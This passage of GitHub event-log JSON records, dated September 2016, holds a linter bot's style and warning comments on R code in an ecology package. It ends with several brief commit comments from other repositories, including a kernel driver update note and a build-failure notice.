~^~~\n```\n[R/Condition.R:217:22:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​\tx <- subplex(initVals, g)\n                     ^~~~~~~~\n```\n[R/drawLocal.R:1:23:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L1) *style:* **Commas should always have a space after.**\n```r\n​pm_sad <- function(th,I,j) {\n                      ^\n```\n[R/drawLocal.R:1:25:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L1) *style:* **Commas should always have a space after.**\n```r\n​pm_sad <- function(th,I,j) {\n                        ^\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n^\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L3) *style:* **lines should not be more than 80 characters.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:3:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n^\n```\n[R/drawLocal.R:3:12:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L3) *style:* **Use <-, not =, for assignment.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n           ^\n```\n[R/drawLocal.R:3:12:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n          ~^~\n```\n[R/drawLocal.R:3:29:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                           ~^~\n```\n[R/drawLocal.R:3:43:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                                         ~^~\n```\n[R/drawLocal.R:3:50:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L3) *style:* **Put spaces around all infix operators.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                                                ~^\n```\n[R/drawLocal.R:3:57:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L3) *style:* **Commented code should be removed.**\n```r\n​\tk1 = unique(round(10^seq(0,log10(j-1),len=1000)))     #k1=unique(round(logspace(0,log10(j-1),1000)));\n                                                        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n^\n```\n[R/drawLocal.R:4:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx0=which(x==0);\n^\n```\n[R/drawLocal.R:4:12:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L4) *style:* **Use <-, not =, for assignment.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n           ^\n```\n[R/drawLocal.R:4:12:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L4) *style:* **Put spaces around all infix operators.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n          ~^~\n```\n[R/drawLocal.R:4:25:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L4) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n                        ^~~~~~~~\n```\n[R/drawLocal.R:4:36:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L4) *style:* **Commented code should be removed.**\n```r\n​\tres=rep(0,length(k1))  \t\t\t\t\t\t\t\t  #res=zeros(1,length(k1));\n                                   ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(cnt in 1:length(k1)) {\n^\n```\n[R/drawLocal.R:5:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx0)) {\n^\n```\n[R/drawLocal.R:5:12:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L5) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(cnt in 1:length(k1)) {\n           ^\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tk = k1[cnt];\n^~\n```\n[R/drawLocal.R:6:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\taux = log(th) + lgamma(I) - lgamma(I+j) +\n^~\n```\n[R/drawLocal.R:6:19:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L6) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tk = k1[cnt];\n                  ^\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:7:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~~\n```\n[R/drawLocal.R:7:19:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x,I,th,j,k));\n^~~\n```\n[R/drawLocal.R:8:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  lgamma(k) +   lgamma(I+j-k) - lgamma(I) + log(I);\n^~~\n```\n[R/drawLocal.R:8:16:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x,I,th,j,k));\n               ^~~~~~~~~\n```\n[R/drawLocal.R:8:35:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\treturn(-1 * pm_sadaux(x,I,th,j,k));\n                                 ~^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty[idx0] = aux;\n^~\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txmax = optimize(f,c(0,1))$minimum\n^~\n```\n[R/drawLocal.R:10:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:22:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\txmax = optimize(f,c(0,1))$minimum\n                     ^\n```\n[R/drawLocal.R:10:22:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txmax = optimize(f,c(0,1))$minimum\n                    ~^~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n^~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx1=which(x==1);\n^\n```\n[R/drawLocal.R:11:10:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n         ^~~~~~~~~\n```\n[R/drawLocal.R:11:22:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n                     ^\n```\n[R/drawLocal.R:11:22:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n                    ~^~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n^~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx1)) {\n^\n```\n[R/drawLocal.R:12:8:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n       ^~~~~~~~~\n```\n[R/drawLocal.R:12:20:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L12) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n                   ^\n```\n[R/drawLocal.R:12:20:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n                  ~^~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tif(ymax<(y0+1)) {\n^~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n^~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin = 0;\n^~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = -Inf;\n^~~\n```\n[R/drawLocal.R:14:30:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\txmin = 0;\n                             ^\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tf <- function(x) {\n^~~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      y[idx1] = 0;\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x,I,th,j,k) - ymax + 1);\n^~~~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th< 1)) {\n^~\n```\n[R/drawLocal.R:17:12:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x,I,th,j,k) - ymax + 1);\n           ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t}\n^~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = Inf;\n^~~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t#xL = f(1e-10);\n^~~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t   }\n^~\n```\n[R/drawLocal.R:19:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L19) *style:* **Commented code should be removed.**\n```r\n​\t\t\t#xL = f(1e-10);\n    ^~~~~~~~~~~~~~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t#xR = f(xmax);\n^~~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:20:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L20) *style:* **Commented code should be removed.**\n```r\n​\t\t\t#xR = f(xmax);\n    ^~~~~~~~~~~~~\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t#cat(cnt,xL,xR,\"\\n\"); flush.console();\n^~~\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidxp = which((x>0)&(x<1));\n^\n```\n[R/drawLocal.R:21:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L21) *style:* **Commented code should be removed.**\n```r\n​\t\t\t#cat(cnt,xL,xR,\"\\n\"); flush.console();\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin = uniroot(f,c(1e-10,xmax))$root;\n^~~\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\txx=x[idxp];\n^\n```\n[R/drawLocal.R:22:30:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L22) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\txmin = uniroot(f,c(1e-10,xmax))$root;\n                             ^\n```\n[R/drawLocal.R:22:30:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\txmin = uniroot(f,c(1e-10,xmax))$root;\n                            ~^~\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n^\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tx1 = (xmax+1)/2;\n^~\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~\n```\n[R/drawLocal.R:24:20:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L24) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tx1 = (xmax+1)/2;\n                   ^\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n^~\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n^~\n```\n[R/drawLocal.R:25:8:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n       ^~~~~~~~~\n```\n[R/drawLocal.R:25:20:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L25) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                   ^\n```\n[R/drawLocal.R:25:20:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                  ~^~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\twhile(ymax < (y1+1)) {\n^~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n^~\n```\n[R/drawLocal.R:26:22:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L26) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\twhile(ymax < (y1+1)) {\n                     ^\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tx1 = (x1 + 1) / 2;\n^~~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n^~\n```\n[R/drawLocal.R:27:28:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L27) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\tx1 = (x1 + 1) / 2;\n                           ^\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty[idxp] = aux;\n^\n```\n[R/drawLocal.R:28:9:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n        ^~~~~~~~~\n```\n[R/drawLocal.R:28:28:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L28) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                           ^\n```\n[R/drawLocal.R:28:28:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/drawLocal.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                          ~^~\n```\n"}},"created_at":"2016-09-22T07:40:58Z"}
{"id":"4600876012","type":"CommitCommentEvent","actor":{"login":"njirap"},"repo":{"name":"andela-aabdulwahab/pilxel"},"payload":{"comment":{"id":19126044,"position":24,"line":31,"path":"django_photo_application/pilxel/tests/test_models.py","commit_id":"c5edb421976548178bdd4c36ffda2b3c3027f2e7","created_at":"2016-09-22T07:42:28Z","updated_at":"2016-09-22T07:42:28Z","body":"use technique 2.0 for testing Folder model creation."}},"created_at":"2016-09-22T07:42:28Z"}
{"id":"4600876355","type":"CommitCommentEvent","actor":{"login":"xress7"},"repo":{"name":"ParanoidNote/void-kernel"},"payload":{"comment":{"id":19126045,"position":null,"line":null,"path":null,"commit_id":"5cd696588ed43c08c3e8514157eb609bfff7dac4","created_at":"2016-09-22T07:42:33Z","updated_at":"2016-09-22T07:42:33Z","body":"Update driver r3p2 to r6p0 https://android.googlesource.com/kernel/exynos/+log/android-exynos-koi-3.10-marshmallow-mr1-wear-release/drivers/gpu and fix "}},"created_at":"2016-09-22T07:42:33Z"}
{"id":"4600877721","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19126048,"position":null,"line":null,"path":null,"commit_id":"f910f8bbf5bb45275d0d3d0fa8e7d37f414a6179","created_at":"2016-09-22T07:42:56Z","updated_at":"2016-09-22T07:42:56Z","body":"Didn't make any difference so reverted for the time being until distribution of updated tres is easier"}},"created_at":"2016-09-22T07:42:56Z"}
{"id":"4600878246","type":"CommitCommentEvent","actor":{"login":"michalbrabec"},"repo":{"name":"DEVSENSE/Parsers"},"payload":{"comment":{"id":19126049,"position":123,"line":1096,"path":"Source/Devsense.PHP.Parser/Syntax/Names.cs","commit_id":"e090da4d782a4391278b98c1ea3fd35b757f08f3","created_at":"2016-09-22T07:43:05Z","updated_at":"2016-09-22T07:43:05Z","body":"Changed back to AddAlias and merged with the other method by the same name (which calls this one)"}},"created_at":"2016-09-22T07:43:05Z"}
{"id":"4600878289","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19126050,"position":null,"line":null,"path":null,"commit_id":"0b017137865933ed5a816c79a87b317e32fee956","created_at":"2016-09-22T07:43:06Z","updated_at":"2016-09-22T07:43:06Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6-beta.3](http://build.prxm.it:8813/viewLog.html?buildId=3670&buildTypeId=nes_mongo_build&guest=1) outcome was **FAILURE**\nSummary: Cannot start build runner; runner failure (new) Build time: 00:02:01"}},"created_at":"2016-09-22T07:43:06Z"}
